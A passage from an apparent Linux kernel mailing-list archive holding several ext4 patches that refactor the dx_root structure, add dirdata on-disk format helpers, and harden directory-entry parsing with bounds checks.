rlen = ext4_rec_len_from_disk(de->rec_len, buf_size);
if ((de->inode ? rlen - nlen : rlen) >= reclen)
break;
@@ -2084,7 +2099,7 @@ void ext4_insert_dentry(struct inode *dir,
int nlen, rlen;
- nlen = ext4_dir_rec_len(de->name_len, dir);
+ nlen = ext4_dir_entry_len(de, buf_size, dir);
rlen = ext4_rec_len_from_disk(de->rec_len, buf_size);
if (de->inode) {
struct ext4_dir_entry_2 *de1 =
@@ -2122,14 +2137,18 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
{
unsigned int blocksize = dir->i_sb->s_blocksize;
int csum_size = 0;
- int err, err2;
+ int err, err2, dlen = 0;
+ unsigned char *data = NULL;
+ /* Deliver data in any appropriate way here. Now it is NULL */
if (ext4_has_feature_metadata_csum(inode->i_sb))
csum_size = sizeof(struct ext4_dir_entry_tail);
if (!de) {
+ if (data)
+ dlen = (*data) + 1;
err = ext4_find_dest_de(dir, bh, bh->b_data,
- blocksize - csum_size, fname, &de);
+ blocksize - csum_size, fname, &de, dlen);
if (err)
return err;
}
@@ -2284,7 +2303,12 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
blocksize);
/* initialize hashing info */
- dx_info = dx_get_dx_info(dot_de);
+ dx_info = dx_get_dx_info(dir, dot_de);
+ if (IS_ERR(dx_info)) {
+ brelse(bh2);
+ brelse(bh);
+ return PTR_ERR(dx_info);
+ }
memset(dx_info, 0, sizeof(*dx_info));
dx_info->info_length = sizeof(*dx_info);
if (ext4_hash_in_dirent(dir))
@@ -2342,7 +2366,7 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
*/
if (retval)
ext4_mark_inode_dirty(handle, dir);
- dx_release(frames);
+ dx_release(dir, frames);
brelse(bh2);
return retval;
}
@@ -2617,8 +2641,13 @@ static int ext4_dx_add_entry(handle_t *handle, struct ext4_filename *fname,
/* Set up root */
dx_set_count(entries, 1);
dx_set_block(entries + 0, newblock);
- info = dx_get_dx_info((struct ext4_dir_entry_2 *)
+ info = dx_get_dx_info(dir, (struct ext4_dir_entry_2 *)
frames[0].bh->b_data);
+ if (IS_ERR(info)) {
+ err = PTR_ERR(info);
+ brelse(bh2);
+ goto journal_error;
+ }
info->indirect_levels += 1;
dxtrace(printk(KERN_DEBUG
"Creating %d level index...\n",
@@ -2646,7 +2675,7 @@ static int ext4_dx_add_entry(handle_t *handle, struct ext4_filename *fname,
ext4_std_error(dir->i_sb, err); /* this is a no-op if err == 0 */
cleanup:
brelse(bh);
- dx_release(frames);
+ dx_release(dir, frames);
/* @restart is true means htree-path has been changed, we need to
* repeat dx_probe() to find out valid htree-path
*/
@@ -2938,7 +2967,7 @@ int ext4_init_dirblock(handle_t *handle, struct inode *inode,
de->inode = cpu_to_le32(inode->i_ino);
de->name_len = 1;
- de->rec_len = ext4_rec_len_to_disk(ext4_dir_rec_len(de->name_len, NULL),
+ de->rec_len = ext4_rec_len_to_disk(ext4_dirent_rec_len(de->name_len, NULL),
blocksize);
memcpy(de->name, ".", 2);
ext4_set_de_type(inode->i_sb, de, S_IFDIR);
@@ -2950,7 +2979,7 @@ int ext4_init_dirblock(handle_t *handle, struct inode *inode,
ext4_set_de_type(inode->i_sb, de, S_IFDIR);
if (inline_buf) {
de->rec_len = ext4_rec_len_to_disk(
- ext4_dir_rec_len(de->name_len, NULL),
+ ext4_dirent_rec_len(de->name_len, NULL),
blocksize);
de = ext4_next_entry(de, blocksize);
header_size = (char *)de - bh->b_data;
@@ -2959,7 +2988,7 @@ int ext4_init_dirblock(handle_t *handle, struct inode *inode,
blocksize - csum_size);
} else {
de->rec_len = ext4_rec_len_to_disk(blocksize -
- (csum_size + ext4_dir_rec_len(1, NULL)),
+ (csum_size + ext4_dirent_rec_len(1, NULL)),
blocksize);
}
@@ -3082,8 +3111,8 @@ bool ext4_empty_dir(struct inode *inode)
}
sb = inode->i_sb;
- if (inode->i_size < ext4_dir_rec_len(1, NULL) +
- ext4_dir_rec_len(2, NULL)) {
+ if (inode->i_size < ext4_dirent_rec_len(1, NULL) +
+ ext4_dirent_rec_len(2, NULL)) {
EXT4_ERROR_INODE(inode, "invalid size");
return false;
}
--
2.43.7
^ permalink raw reply related
* [PATCH v4 07/11] ext4: add ext4_dir_entry_len() and harden dirdata parsing
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Introduce ext4_dir_entry_len() helper to compute the required
rec_len for a directory entry, taking into account dirdata and
casefold+fscrypt hash space.
Convert ext4_dirent_get_data_len() to take the decoded rec_len
as an argument and add bounds checking when walking dirdata
extensions to avoid overruns on malformed entries.
Update dx_root_limit() to use ext4_dir_entry_len() instead of
open-coded ext4_dir_rec_len() for '.' and '..' entries.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 51 ++++++++++++++++++++++++++++++++++++++++++++++---
fs/ext4/namei.c | 23 ++++++++++++++--------
2 files changed, 63 insertions(+), 11 deletions(-)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 2f29f50a12ac..a369a0cd04bc 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -4075,6 +4075,7 @@ static inline bool ext4_dir_entry_is_tail(struct ext4_dir_entry_2 *de)
/*
* ext4_dirent_get_data_len() - Compute the total dirdata length for an entry.
* @de: directory entry
+ * @rec_len: the record length of the directory entry (decoded)
*
* Computes the length of optional data stored after the filename (and its
* implicit NUL terminator). Each extension is indicated by a bit in the
@@ -4083,22 +4084,41 @@ static inline bool ext4_dir_entry_is_tail(struct ext4_dir_entry_2 *de)
*
* Returns 0 for tail entries and for entries with no dirdata.
*/
-static inline int ext4_dirent_get_data_len(struct ext4_dir_entry_2 *de)
+static inline int ext4_dirent_get_data_len(struct ext4_dir_entry_2 *de,
+ unsigned int rec_len)
{
__u8 extra_data_flags;
struct ext4_dirent_data_header *ddh;
int dlen = 0;
+ unsigned int offset;
if (ext4_dir_entry_is_tail(de))
return 0;
extra_data_flags = (de->file_type & ~EXT4_FT_MASK) >> 4;
- ddh = (struct ext4_dirent_data_header *)(de->name + de->name_len +
- 1 /* NUL terminator */);
+ /* offset from start of entry to after filename + NUL */
+ offset = EXT4_BASE_DIR_LEN + de->name_len + 1;
+ /* bounds check: ensure we start reading within the entry */
+ if (offset >= rec_len)
+ return 0;
+
+ ddh = (struct ext4_dirent_data_header *)((char *)de + offset);
+
while (extra_data_flags) {
if (extra_data_flags & 1) {
+ /* bounds check before reading ddh_length */
+ if (offset + sizeof(*ddh) >
+ rec_len)
+ return dlen;
+
+ /* validate ddh_length is reasonable */
+ if (ddh->ddh_length == 0 || ddh->ddh_length >
+ rec_len - offset)
+ return dlen;
+
dlen += ddh->ddh_length + (dlen == 0);
+ offset += ddh->ddh_length;
ddh = ext4_dirdata_next(ddh);
}
extra_data_flags >>= 1;
@@ -4106,6 +4126,31 @@ static inline int ext4_dirent_get_data_len(struct ext4_dir_entry_2 *de)
return dlen;
}
+/*
+ * ext4_dir_entry_len() - Compute the required rec_len for a directory entry.
+ * @de: directory entry (used to read name_len and any dirdata length)
+ * @blocksize: size of the buffer @de lives in (the real directory block
+ * size, or the smaller inline-data buffer size for inline
+ * directories) -- used only to decode @de->rec_len's "0/65535
+ * means rest of buffer" sentinel correctly.
+ * @dir: directory inode (may be NULL for '.' and '..' entries, which
+ * never carry the casefold+fscrypt hash regardless of the
+ * directory's feature flags)
+ *
+ * Returns the minimum record length needed to hold @de, rounded up to the
+ * directory alignment and including room for the casefold+fscrypt hash if
+ * the directory requires it.
+ */
+static inline unsigned int ext4_dir_entry_len(struct ext4_dir_entry_2 *de,
+ unsigned int blocksize,
+ const struct inode *dir)
+{
+ unsigned int rec_len = ext4_rec_len_from_disk(de->rec_len, blocksize);
+ unsigned int dirdata = ext4_dirent_get_data_len(de, rec_len);
+
+ return ext4_dir_rec_len(de->name_len + dirdata, dir);
+}
+
extern const struct iomap_ops ext4_iomap_ops;
extern const struct iomap_ops ext4_iomap_report_ops;
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 61410fa0effa..e2dda8dee77c 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -578,11 +578,15 @@ static inline void dx_set_limit(struct dx_entry *entries, unsigned value)
((struct dx_countlimit *) entries)->limit = cpu_to_le16(value);
}
-static inline unsigned dx_root_limit(struct inode *dir, unsigned infosize)
+static inline unsigned dx_root_limit(struct inode *dir,
+ struct ext4_dir_entry_2 *dot_de)
{
- unsigned int entry_space = dir->i_sb->s_blocksize -
- ext4_dir_rec_len(1, NULL) -
- ext4_dir_rec_len(2, NULL) - infosize;
+ struct dx_root_info *info;
+ unsigned int entry_space;
+
+ info = dx_get_dx_info(dot_de);
+ entry_space = dir->i_sb->s_blocksize - ((char *)info - (char *)dot_de) -
+ info->info_length;
if (ext4_has_feature_metadata_csum(dir->i_sb))
entry_space -= sizeof(struct dx_tail);
@@ -858,10 +862,13 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
entries = (struct dx_entry *)(((char *)info) + info->info_length);
- if (dx_get_limit(entries) != dx_root_limit(dir, info->info_length)) {
+ if (dx_get_limit(entries) !=
+ dx_root_limit(dir, (struct ext4_dir_entry_2 *)frame->bh->b_data)) {
ext4_warning_inode(dir, "dx entry: limit %u != root limit %u",
dx_get_limit(entries),
- dx_root_limit(dir, info->info_length));
+ dx_root_limit(dir,
+ (struct ext4_dir_entry_2 *)frame->bh->b_data
+ ));
goto fail;
}
@@ -2286,10 +2293,10 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
dx_info->hash_version =
EXT4_SB(dir->i_sb)->s_def_hash_version;
- entries = (void *)dx_info + sizeof(*dx_info);
+ entries = (void *)dx_info + dx_info->info_length;
dx_set_block(entries, 1);
dx_set_count(entries, 1);
- dx_set_limit(entries, dx_root_limit(dir, sizeof(*dx_info)));
+ dx_set_limit(entries, dx_root_limit(dir, dot_de));
/* Initialize as for dx_probe */
fname->hinfo.hash_version = dx_info->hash_version;
--
2.43.7
^ permalink raw reply related
* [PATCH v4 06/11] ext4: preserve dirdata bits in get_dtype()
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Mask the filetype with EXT4_FT_MASK when indexing
ext4_filetype_table[] to avoid using dirdata bits as an index.
Preserve the extra bits
stored in the upper part of filetype and propagate them to the
returned dtype value.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 98603aa44693..2f29f50a12ac 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -3046,12 +3046,15 @@ static const unsigned char ext4_filetype_table[] = {
DT_UNKNOWN, DT_REG, DT_DIR, DT_CHR, DT_BLK, DT_FIFO, DT_SOCK, DT_LNK
};
-static inline unsigned char get_dtype(struct super_block *sb, int filetype)
+static inline unsigned char get_dtype(struct super_block *sb, int filetype)
{
- if (!ext4_has_feature_filetype(sb) || filetype >= EXT4_FT_MAX)
+ unsigned char fl_index = filetype & EXT4_FT_MASK;
+
+ if (!ext4_has_feature_filetype(sb) || fl_index >= EXT4_FT_MAX)
return DT_UNKNOWN;
- return ext4_filetype_table[filetype];
+ return (ext4_filetype_table[fl_index]) |
+ (filetype & ~EXT4_FT_MASK);
}
extern int ext4_check_all_de(struct inode *dir, struct buffer_head *bh,
void *buf, int buf_size);
--
2.43.7
^ permalink raw reply related
* [PATCH v4 05/11] ext4: add dirdata format definitions and access helpers
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4
Cc: adilger.kernel, Artem Blagodarenko, Pravin Shelar, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Define the on-disk format for ext4 directory entry extension data.
The upper four bits of de->file_type indicate the presence of
optional data stored after the filename NUL terminator. This patch
defines flags for LUFID, 64-bit inode numbers, and casefold hash
data stored in that area.
Add struct ext4_dirent_data_header to describe variable-length
extension records and struct ext4_dirent_hash for hash storage used
by casefold and fscrypt.
Provide ext4_dirdata_next() to advance to the next extension record
and ext4_dirent_get_data_len() to compute the total extension data
length associated with a directory entry.
No functional changes.
Signed-off-by: Pravin Shelar <pravin.shelar@sun.com>
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@diliger.ca>
---
fs/ext4/ext4.h | 83 ++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 83 insertions(+)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 9400bc2858a5..98603aa44693 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -2556,6 +2556,49 @@ struct ext4_dir_entry_tail {
#define EXT4_FT_SYMLINK 7
#define EXT4_FT_MAX 8
+#define EXT4_FT_MASK 0xf
+
+#if EXT4_FT_MAX > EXT4_FT_MASK
+#error "conflicting EXT4_FT_MAX and EXT4_FT_MASK"
+#endif
+
+/*
+ * d_type has 4 unused bits, so it can hold four types of data. These different
+ * types of data (e.g. fscypt hash, high 32 bits of 64-bit inode number) can be
+ * stored, in flag order, after file-name in ext4 dirent.
+ *
+ * These flags are added to d_type if ext4 dirent has extra data after
+ * filename. This data length is variable and length is stored in first byte
+ * of data. Data starts after filename NUL byte.
+ */
+#define EXT4_DIRENT_LUFID 0x10
+#define EXT4_DIRENT_INO64 0x20
+#define EXT4_DIRENT_CFHASH 0x40
+
+struct ext4_fid {
+ char fid[16]; /* 128-bit unique file identifier */
+};
+
+struct ext4_dirent_data_header {
+ /* length of this header + the whole data blob */
+ __u8 ddh_length;
+} __packed;
+
+struct ext4_dirent_fid {
+ struct ext4_dirent_data_header df_header;
+ struct ext4_fid df_fid[];
+};
+
+#define EXT4_LUFID_MAGIC 0xAD200907UL
+struct ext4_dentry_param {
+ __u32 edp_magic; /* EXT4_LUFID_MAGIC */
+ struct ext4_dirent_fid edp_dfid;
+};
+
+struct ext4_dirent_hash {
+ struct ext4_dirent_data_header dh_header;
+ struct ext4_dir_entry_hash dh_hash;
+} __packed;
#define EXT4_FT_DIR_CSUM 0xDE
@@ -4004,6 +4047,12 @@ static inline void ext4_clear_io_unwritten_flag(ext4_io_end_t *io_end)
io_end->flag &= ~EXT4_IO_END_UNWRITTEN;
}
+/*
+ * Advance to the next dirdata record header starting from @ddh.
+ */
+#define ext4_dirdata_next(ddh) \
+ ((struct ext4_dirent_data_header *)((char *)(ddh) + (ddh)->ddh_length))
+
/*
* ext4_dir_entry_is_tail() - Check if a directory entry is a tail entry.
* @de: directory entry to check
@@ -4020,6 +4069,40 @@ static inline bool ext4_dir_entry_is_tail(struct ext4_dir_entry_2 *de)
t->det_reserved_ft == EXT4_FT_DIR_CSUM;
}
+/*
+ * ext4_dirent_get_data_len() - Compute the total dirdata length for an entry.
+ * @de: directory entry
+ *
+ * Computes the length of optional data stored after the filename (and its
+ * implicit NUL terminator). Each extension is indicated by a bit in the
+ * high 4 bits of de->file_type; the first byte of each extension is its
+ * length (including that length byte itself).
+ *
+ * Returns 0 for tail entries and for entries with no dirdata.
+ */
+static inline int ext4_dirent_get_data_len(struct ext4_dir_entry_2 *de)
+{
+ __u8 extra_data_flags;
+ struct ext4_dirent_data_header *ddh;
+ int dlen = 0;
+
+ if (ext4_dir_entry_is_tail(de))
+ return 0;
+
+ extra_data_flags = (de->file_type & ~EXT4_FT_MASK) >> 4;
+ ddh = (struct ext4_dirent_data_header *)(de->name + de->name_len +
+ 1 /* NUL terminator */);
+
+ while (extra_data_flags) {
+ if (extra_data_flags & 1) {
+ dlen += ddh->ddh_length + (dlen == 0);
+ ddh = ext4_dirdata_next(ddh);
+ }
+ extra_data_flags >>= 1;
+ }
+ return dlen;
+}
+
extern const struct iomap_ops ext4_iomap_ops;
extern const struct iomap_ops ext4_iomap_report_ops;
--
2.43.7
^ permalink raw reply related
* [PATCH v4 04/11] ext4: refactor dx_root to support variable dirent sizes
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4
Cc: adilger.kernel, Artem Blagodarenko, Pravin Shelar, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Split monolithic definition of dx_root struct to separate dx_root_info
from fake struct ext4_dir_entry2 for improved code readability.
This allows "." and ".." dirents to have different sizes if necessary,
since we can't assume the rec_len 12 if dx_root dirents have dirdata.
Adds dx_get_dx_info() accessor instead of complex typecast at callers.
Does not change any functionality.
Signed-off-by: Pravin Shelar <pravin.shelar@sun.com>
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/namei.c | 145 +++++++++++++++++++++++-------------------------
1 file changed, 70 insertions(+), 75 deletions(-)
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 2fc14332fab7..61410fa0effa 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -244,22 +244,13 @@ struct dx_entry
* hash version mod 4 should never be 0. Sincerely, the paranoia department.
*/
-struct dx_root
+struct dx_root_info
{
- struct fake_dirent dot;
- char dot_name[4];
- struct fake_dirent dotdot;
- char dotdot_name[4];
- struct dx_root_info
- {
- __le32 reserved_zero;
- u8 hash_version;
- u8 info_length; /* 8 */
- u8 indirect_levels;
- u8 unused_flags;
- }
- info;
- struct dx_entry entries[];
+ __le32 reserved_zero;
+ u8 hash_version;
+ u8 info_length; /* 8 */
+ u8 indirect_levels;
+ u8 unused_flags;
};
struct dx_node
@@ -536,6 +527,16 @@ ext4_next_entry(struct ext4_dir_entry_2 *p, unsigned long blocksize)
* Future: use high four bits of block for coalesce-on-delete flags
* Mask them off for now.
*/
+static struct dx_root_info *dx_get_dx_info(void *de_buf)
+{
+ /* get dotdot first */
+ de_buf = de_buf + ext4_dir_rec_len(1, NULL);
+
+ /* dx root info is after dotdot entry */
+ de_buf = de_buf + ext4_dir_rec_len(2, NULL);
+
+ return (struct dx_root_info *)de_buf;
+}
static inline ext4_lblk_t dx_get_block(struct dx_entry *entry)
{
@@ -783,7 +784,7 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
{
unsigned count, indirect, level, i;
struct dx_entry *at, *entries, *p, *q, *m;
- struct dx_root *root;
+ struct dx_root_info *info;
struct dx_frame *frame = frame_in;
struct dx_frame *ret_err = ERR_PTR(ERR_BAD_DX_DIR);
u32 hash;
@@ -795,23 +796,24 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
if (IS_ERR(frame->bh))
return (struct dx_frame *) frame->bh;
- root = (struct dx_root *) frame->bh->b_data;
- if (root->info.hash_version != DX_HASH_TEA &&
- root->info.hash_version != DX_HASH_HALF_MD4 &&
- root->info.hash_version != DX_HASH_LEGACY &&
- root->info.hash_version != DX_HASH_SIPHASH) {
- ext4_warning_inode(dir, "Unrecognised inode hash code %u",
- root->info.hash_version);
+ info = dx_get_dx_info((struct ext4_dir_entry_2 *)frame->bh->b_data);
+ if (info->hash_version != DX_HASH_TEA &&
+ info->hash_version != DX_HASH_HALF_MD4 &&
+ info->hash_version != DX_HASH_LEGACY &&
+ info->hash_version != DX_HASH_SIPHASH) {
+ ext4_warning(dir->i_sb,
+ "Unrecognised inode hash code %d for directory #%llu",
+ info->hash_version, dir->i_ino);
goto fail;
}
if (ext4_hash_in_dirent(dir)) {
- if (root->info.hash_version != DX_HASH_SIPHASH) {
+ if (info->hash_version != DX_HASH_SIPHASH) {
ext4_warning_inode(dir,
"Hash in dirent, but hash is not SIPHASH");
goto fail;
}
} else {
- if (root->info.hash_version == DX_HASH_SIPHASH) {
+ if (info->hash_version == DX_HASH_SIPHASH) {
ext4_warning_inode(dir,
"Hash code is SIPHASH, but hash not in dirent");
goto fail;
@@ -819,7 +821,7 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
}
if (fname)
hinfo = &fname->hinfo;
- hinfo->hash_version = root->info.hash_version;
+ hinfo->hash_version = info->hash_version;
if (hinfo->hash_version <= DX_HASH_TEA)
hinfo->hash_version += EXT4_SB(dir->i_sb)->s_hash_unsigned;
hinfo->seed = EXT4_SB(dir->i_sb)->s_hash_seed;
@@ -835,13 +837,13 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
}
hash = hinfo->hash;
- if (root->info.unused_flags & 1) {
+ if (info->unused_flags & 1) {
ext4_warning_inode(dir, "Unimplemented hash flags: %#06x",
- root->info.unused_flags);
+ info->unused_flags);
goto fail;
}
- indirect = root->info.indirect_levels;
+ indirect = info->indirect_levels;
if (indirect >= ext4_dir_htree_level(dir->i_sb)) {
ext4_warning(dir->i_sb,
"Directory (ino: %llu) htree depth %#06x exceed"
@@ -854,14 +856,12 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
goto fail;
}
- entries = (struct dx_entry *)(((char *)&root->info) +
- root->info.info_length);
+ entries = (struct dx_entry *)(((char *)info) + info->info_length);
- if (dx_get_limit(entries) != dx_root_limit(dir,
- root->info.info_length)) {
+ if (dx_get_limit(entries) != dx_root_limit(dir, info->info_length)) {
ext4_warning_inode(dir, "dx entry: limit %u != root limit %u",
dx_get_limit(entries),
- dx_root_limit(dir, root->info.info_length));
+ dx_root_limit(dir, info->info_length));
goto fail;
}
@@ -947,7 +947,7 @@ static void dx_release(struct dx_frame *frames)
if (frames[0].bh == NULL)
return;
- info = &((struct dx_root *)frames[0].bh->b_data)->info;
+ info = dx_get_dx_info((struct ext4_dir_entry_2 *)frames[0].bh->b_data);
/* save local copy, "info" may be freed after brelse() */
indirect_levels = info->indirect_levels;
for (i = 0; i <= indirect_levels; i++) {
@@ -2159,44 +2159,38 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
return err ? err : err2;
}
-static bool ext4_check_dx_root(struct inode *dir, struct dx_root *root)
+static bool ext4_check_dx_root(struct inode *dir,
+ struct ext4_dir_entry_2 *dot_de,
+ struct ext4_dir_entry_2 *dotdot_de,
+ struct ext4_dir_entry_2 **entry)
{
- struct fake_dirent *fde;
const char *error_msg;
- unsigned int rlen;
unsigned int blocksize = dir->i_sb->s_blocksize;
- char *blockend = (char *)root + dir->i_sb->s_blocksize;
+ struct ext4_dir_entry_2 *de = NULL;
- fde = &root->dot;
- if (unlikely(fde->name_len != 1)) {
+ if (unlikely(dot_de->name_len != 1)) {
error_msg = "invalid name_len for '.'";
goto corrupted;
}
- if (unlikely(strncmp(root->dot_name, ".", fde->name_len))) {
+ if (unlikely(strncmp(dot_de->name, ".", dot_de->name_len))) {
error_msg = "invalid name for '.'";
goto corrupted;
}
- rlen = ext4_rec_len_from_disk(fde->rec_len, blocksize);
- if (unlikely((char *)fde + rlen >= blockend)) {
- error_msg = "invalid rec_len for '.'";
- goto corrupted;
- }
- fde = &root->dotdot;
- if (unlikely(fde->name_len != 2)) {
+ if (unlikely(dotdot_de->name_len != 2)) {
error_msg = "invalid name_len for '..'";
goto corrupted;
}
- if (unlikely(strncmp(root->dotdot_name, "..", fde->name_len))) {
+ if (unlikely(strncmp(dotdot_de->name, "..", dotdot_de->name_len))) {
error_msg = "invalid name for '..'";
goto corrupted;
}
- rlen = ext4_rec_len_from_disk(fde->rec_len, blocksize);
- if (unlikely((char *)fde + rlen >= blockend)) {
+ de = ext4_next_entry(dotdot_de, blocksize);
+ if ((char *)de >= (((char *)dot_de) + blocksize)) {
error_msg = "invalid rec_len for '..'";
goto corrupted;
}
-
+ *entry = de;
return true;
corrupted:
@@ -2214,16 +2208,15 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
struct inode *inode, struct buffer_head *bh)
{
struct buffer_head *bh2;
- struct dx_root *root;
struct dx_frame frames[EXT4_HTREE_LEVEL], *frame;
struct dx_entry *entries;
- struct ext4_dir_entry_2 *de, *de2;
+ struct ext4_dir_entry_2 *de, *de2, *dot_de, *dotdot_de;
char *data2, *top;
unsigned len;
int retval;
unsigned blocksize;
ext4_lblk_t block;
- struct fake_dirent *fde;
+ struct dx_root_info *dx_info;
int csum_size = 0;
if (ext4_has_feature_metadata_csum(inode->i_sb))
@@ -2240,17 +2233,15 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
return retval;
}
- root = (struct dx_root *) bh->b_data;
- if (!ext4_check_dx_root(dir, root)) {
+ dot_de = (struct ext4_dir_entry_2 *)bh->b_data;
+ dotdot_de = ext4_next_entry(dot_de, blocksize);
+ if (!ext4_check_dx_root(dir, dot_de, dotdot_de, &de)) {
brelse(bh);
return -EFSCORRUPTED;
}
/* The 0th block becomes the root, move the dirents out */
- fde = &root->dotdot;
- de = (struct ext4_dir_entry_2 *)((char *)fde +
- ext4_rec_len_from_disk(fde->rec_len, blocksize));
- len = ((char *) root) + (blocksize - csum_size) - (char *) de;
+ len = ((char *)dot_de) + (blocksize - csum_size) - (char *)de;
/* Allocate new block for the 0th block's dirents */
bh2 = ext4_append(handle, dir, &block);
@@ -2281,24 +2272,27 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
ext4_initialize_dirent_tail(bh2, blocksize);
/* Initialize the root; the dot dirents already exist */
- de = (struct ext4_dir_entry_2 *) (&root->dotdot);
- de->rec_len = ext4_rec_len_to_disk(
- blocksize - ext4_dir_rec_len(2, NULL), blocksize);
- memset (&root->info, 0, sizeof(root->info));
- root->info.info_length = sizeof(root->info);
+ dotdot_de->rec_len =
+ ext4_rec_len_to_disk(blocksize - le16_to_cpu(dot_de->rec_len),
+ blocksize);
+
+ /* initialize hashing info */
+ dx_info = dx_get_dx_info(dot_de);
+ memset(dx_info, 0, sizeof(*dx_info));
+ dx_info->info_length = sizeof(*dx_info);
if (ext4_hash_in_dirent(dir))
- root->info.hash_version = DX_HASH_SIPHASH;
+ dx_info->hash_version = DX_HASH_SIPHASH;
else
- root->info.hash_version =
+ dx_info->hash_version =
EXT4_SB(dir->i_sb)->s_def_hash_version;
- entries = root->entries;
+ entries = (void *)dx_info + sizeof(*dx_info);
dx_set_block(entries, 1);
dx_set_count(entries, 1);
- dx_set_limit(entries, dx_root_limit(dir, sizeof(root->info)));
+ dx_set_limit(entries, dx_root_limit(dir, sizeof(*dx_info)));
/* Initialize as for dx_probe */
- fname->hinfo.hash_version = root->info.hash_version;
+ fname->hinfo.hash_version = dx_info->hash_version;
if (fname->hinfo.hash_version <= DX_HASH_TEA)
fname->hinfo.hash_version += EXT4_SB(dir->i_sb)->s_hash_unsigned;
fname->hinfo.seed = EXT4_SB(dir->i_sb)->s_hash_seed;
@@ -2608,7 +2602,7 @@ static int ext4_dx_add_entry(handle_t *handle, struct ext4_filename *fname,
if (restart || err)
goto journal_error;
} else {
- struct dx_root *dxroot;
+ struct dx_root_info *info;
memcpy((char *) entries2, (char *) entries,
icount * sizeof(struct dx_entry));
dx_set_limit(entries2, dx_node_limit(dir));
@@ -2616,8 +2610,9 @@ static int ext4_dx_add_entry(handle_t *handle, struct ext4_filename *fname,
/* Set up root */
dx_set_count(entries, 1);
dx_set_block(entries + 0, newblock);
- dxroot = (struct dx_root *)frames[0].bh->b_data;
- dxroot->info.indirect_levels += 1;
+ info = dx_get_dx_info((struct ext4_dir_entry_2 *)
+ frames[0].bh->b_data);
+ info->indirect_levels += 1;
dxtrace(printk(KERN_DEBUG
"Creating %d level index...\n",
dxroot->info.indirect_levels));
--
2.43.7
^ permalink raw reply related
* [PATCH v4 03/11] ext4: add ext4_dir_entry_is_tail()
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Replace open-coded checks for directory tail entries with a call
to ext4_dir_entry_is_tail(). This helper will also be used by
upcoming changes.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 16 ++++++++++++++++
fs/ext4/namei.c | 7 +------
2 files changed, 17 insertions(+), 6 deletions(-)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index b37c136ea3ab..9400bc2858a5 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -4004,6 +4004,22 @@ static inline void ext4_clear_io_unwritten_flag(ext4_io_end_t *io_end)
io_end->flag &= ~EXT4_IO_END_UNWRITTEN;
}
+/*
+ * ext4_dir_entry_is_tail() - Check if a directory entry is a tail entry.
+ * @de: directory entry to check
+ *
+ * Returns true if @de is a directory block tail entry (checksum record).
+ */
+static inline bool ext4_dir_entry_is_tail(struct ext4_dir_entry_2 *de)
+{
+ struct ext4_dir_entry_tail *t = (struct ext4_dir_entry_tail *)de;
+
+ return !t->det_reserved_zero1 &&
+ le16_to_cpu(t->det_rec_len) == sizeof(*t) &&
